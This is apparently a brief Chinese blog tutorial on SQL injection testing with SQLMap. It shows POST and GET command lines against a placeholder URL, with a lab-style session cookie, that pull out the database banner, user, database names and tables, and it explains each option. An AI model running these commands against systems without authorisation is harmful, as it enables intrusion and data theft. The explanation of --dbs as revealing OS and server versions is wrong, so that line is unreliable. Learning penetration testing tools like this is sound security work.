SQL注入攻击之SQLMap渗透测试

准备工具:Python2.7.9、SQLMap、FireFox插件Tamper Data
SQLMap进行渗透测试
FireFox插件Tamper Data用于获取Post参数数据和Cookie值
示例:
SQLMap POST方法:sqlmap.py -u "http://www.url.com" --data "param1=1¶m2=2"  --cookie="PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low" -b --current-db --current-user

使用选项:
1、--cookie : 设置我们的cookie值
2、-u : 指定目标URL
3、-b : 获取DBMS banner
4、--current-db : 获取当前数据库
5、--current-user : 获取当前用户
6、--data : data后面是URL的Post参数值
7、--dbs : 获取服务器操作系统版本(Windows/Linux)、应用开发技术(ASP.NET/Java)、应用服务器版本(IIS/JBoss)、以及数据库版本(MySQL/Oracle)


SQL注入攻击之SQLMap渗透测试_第1张图片



SQLMap GET方法:sqlmap.py -u "http://www.url.com?id=1" --dbms "Microsoft Access" -D "Microsoft_Access_masterdb" --tables


使用选项:
1、--dbms "Microsoft Access":dbms后面参数是我们所使用的数据库,如MySQL、Oracle等
2、-D "Microsoft_Access_masterdb":-D指定数据库名称
3、--tables:列出当前数据库所有表名
4、--columns:列出指定表的字段


相关阅读:
1、http://www.freebuf.com/articles/web/29942.html
2、http://blog.csdn.net/zgyulongfei/article/details/41017493
3、http://www.freebuf.com/sectool/2311.html



你可能感兴趣的:(安全)